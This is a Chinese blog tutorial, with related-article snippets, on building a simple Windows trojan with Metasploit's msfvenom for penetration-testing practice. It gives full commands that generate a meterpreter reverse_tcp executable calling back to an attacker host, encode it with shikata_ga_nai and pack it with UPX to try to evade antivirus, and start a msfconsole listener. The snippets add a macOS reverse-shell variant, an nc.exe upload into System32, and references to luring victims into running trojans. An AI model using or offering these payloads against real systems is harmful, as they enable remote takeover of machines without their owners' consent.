简单木马生成

最新推荐文章于 2025-04-29 13:40:10 发布
原创 最新推荐文章于 2025-04-29 13:40:10 发布 · 6.3k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux 渗透测试

  1. 工具:msfvenom
    1.1 msfvenom的简介
    msfvenom是kali linux下一个可以产生自定义payload的程序,是净荷生成和编码的组合。msfvenom主要使用msf作为框架,可以多平台互通,并为我们使用和练习提供了非常的帮助。有关msfvenom的参数,在这里我只说几个比较常用的参数,其他的请百度。
    1.2msfvenom的常用参数:
    -p :< payload >
    指定一个有效的自定义载荷
    -l :< list >
    列出一个模块类型,选项有:有效载荷,编码器,NOP,所有
    -f:< format >
    输出格式
    -a:< arch >
    使用的架构
    -i:< iterations >
    有效载荷的次数
    -e:< encoder >
    所使用的编码方式
    2.实例
    在终端输入以下命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b "\x00" lhost=10.5.69.128 lport=4444 -f exe > test.exe

这里写图片描述
可以看到,在主文件下已经生成了test.exe文件
这里写图片描述
将该文件拖拽到测试机中使用杀毒软件扫描
这里写图片描述
扫描结果:
这里写图片描述
用upx命令对文件压缩加壳
这里写图片描述
再次用杀毒软件测试是否免杀,没通过,没事我们把该文件复制到虚拟机win7中继续我们的工作(哈哈,这里不是为了打广告,而是这个木马确实很简陋很简陋,再说杀毒软件也不是摆设对不对)
这里写图片描述

复制到虚拟机中的win7之后双击运行,打开linux终端,输入msfconsole,开始监听,

按下图所示输入命令,设置监听选项,
这里写图片描述
依次输入下列命令,回车,已经开始监听
这里写图片描述
然后在测试机双击运行test,可以看到在主机上看到了会话
这里写图片描述

Metasploit 生成木马
2201_75516783的博客
11-28 923
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
一个简单木马程序的实现
热门推荐
天绝弑杀
06-09 1万+
一个简单木马的实现,麻雀虽小,五脏俱全,用到了socket窗口隐藏技术
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
分享Python知识
10-02 2893
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
木马生成技术
zhoubaocun的专栏
04-02 599
作者:open来源:opens Blog经常会看到鸽子或一些木马可以自定义生成一个服务端程序,开始很奇怪,他是怎么做到的!后来去网上搜了下,但是没找到相关文章! 后来碰巧得到了一个QQ病毒的源代码,而这个程序就可以生成一个文件,于是就研究了下代码,但是收获不大,但是很实用,他的大致思路鸽子是一样的:原理一:在程序的尾部追加数据,然后程序运行时从尾部读取数据,这个方法看似容易,但是实际操作的时候
Metasploit(msf)木马生成
m0_58713554的博客
11-04 380
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击机ip set LPORT 配置参数 6 run 运行 7 把刚...
简单木马的制作
qq_66656628的博客
03-07 654
展示简单木马的制作过程,对我们防范木马具有启示
靶机测试,kali生成windows木马程序
2301_76361674的博客
05-03 1575
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限。
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程(1)
m0_60750088的博客
04-29 740
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马
m0_54903333的博客
04-29 561
参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows7,因为其漏洞比较多,一般不需要关闭电脑原有的杀毒程序,win10以上一般都需要关闭杀毒程序步骤如下:完成以上步骤之后就可以将生成木马放到虚拟机上的靶机或者物理机上(随便放到哪里都行)tips:要在虚拟机
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 2029
一,目的:熟悉msfvenom生成木马程序过程,并执行监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
kali 中使用msf生成远控木马入侵windows(简单易懂,小白轻松上手)
保持进步,保持少年感
01-31 1442
kali 中使用msf生成远控木马入侵windows
木马如何生成--简易木马的制作,从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
04-29 927
真不是标题党,这回咱不聊虚头巴脑的学习路线,直接上干货——手把手教你撸一个简易木马。别误会,毕竟,天天用加载器生成木马,却不知道背后原理,跟盲人摸象有啥区别?虽然脚本能绕过360,但终究是治标不治本。
使用Kali Linux系统生成木马病毒并实现远程控制计算机
2401_84578953的博客
09-21 2914
木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16(虚拟机)Kali Linux 2021(系统)
Msfvenom生成木马实验
m0_74025111的博客
04-24 1754
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload
Metasploit -- 木马生成原理方法
Web安全工具库
05-07 2444
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 3036
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
MSF生成木马木马简单使用
爱喝水的仙人树的博客
11-03 1万+
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
关于木马生成技术
06-19 653
文:RQC 以前才接触一些别人写的远程控制类软件的时候,总感觉很神奇,尤其是那个可以自定义生成一个带密码的木马,现在知道是怎么搞的了!,比如在C#里   如下:1.先把被控端(木马端)加载到程序资源文件里2.从服务端文件把被控端分离出来下来就是如何取到资源文件了,在C#中提供这样一个类:Resources,需要引入PrjServer.Properties 这个命名空间,我们
msf木马生成
03-14
### Metasploit Framework 使用 MSFVenom 生成木马教程 #### 工具概述 Metasploit 是一种功能强大的渗透测试框架,其中 `msfvenom` 是其核心工具之一,专门用于生成各种类型的恶意载荷(payload)。这些 payload 可以被用来创建后门程序、远程控制目标机器或者执行其他攻击向量。 #### 基本命令结构 `msfvenom` 的基本语法如下所示: ```bash msfvenom -p <payload> LHOST=<your_ip_address> LPORT=<port_number> -f <output_format> -o <output_file> ``` - `-p`: 指定要使用的 payload 类型。 - `LHOST`: 设置本地监听地址,通常是攻击者的 IP 地址。 - `LPORT`: 设置本地监听端口,通常由攻击者指定- `-f`: 输出文件格式,例如 exe, dll, apk 等。 - `-o`: 将生成的文件保存到指定路径[^1]。 #### 实际案例分析 ##### Windows 平台下的木马生成 对于 Windows 系统的目标设备,可以选择常见的 reverse shell payload 来建立反向连接。以下是具体的操作方法: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 -o shell.exe ``` 上述命令解释如下: - `-p windows/meterpreter/reverse_tcp`: 定义了一个基于 Meterpreter 的 TCP 反向 Shell 载荷。 - `LHOST=192.168.1.10`: 攻击方服务器的 IP 地址。 - `LPORT=4444`: 设定监听端口号为 4444。 - `-f exe`: 文件输出格式设置为可执行 EXE 文件。 - `-e x86/shikata_ga_nai`: 对载荷进行了编码处理,目的是规避一些基础的安全检测机制。 - `-i 5`: 编码迭代次数设定为五次,增加解码难度从而提高免杀率。 ##### Mac OS X 后门生成实例 如果目标操作系统是 macOS,则可以通过下面这条指令来构建适合该环境的后门程序: ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o shell.macho ``` 这里选择了针对苹果电脑架构设计好的特定 payload,并将其封装成 Mach-O 格式的二进制文件以便于部署在 MacOS 上运行[^4]。 #### Payload 功能扩展说明 除了简单的命令行交互外,Meterpreter 提供了丰富的内置模块支持更复杂的操作需求比如上传下载文件等功能。例如通过已获得 meterpreter session 执行以下命令即可完成从本地传输 nc.exe 到远端 C:\Windows\System32 目录下: ```plaintext meterpreter > upload /usr/share/windows-binaries/nc.exe c:/windows/system32/ ``` 这一步骤展示了如何利用成功植入后的会话进一步实施更多潜在危害行动[^3]。 #### 注意事项 尽管技术本身并无善恶之分,在实际应用过程中务必严格遵守法律法规以及道德准则,仅限授权范围内开展相关研究学习活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值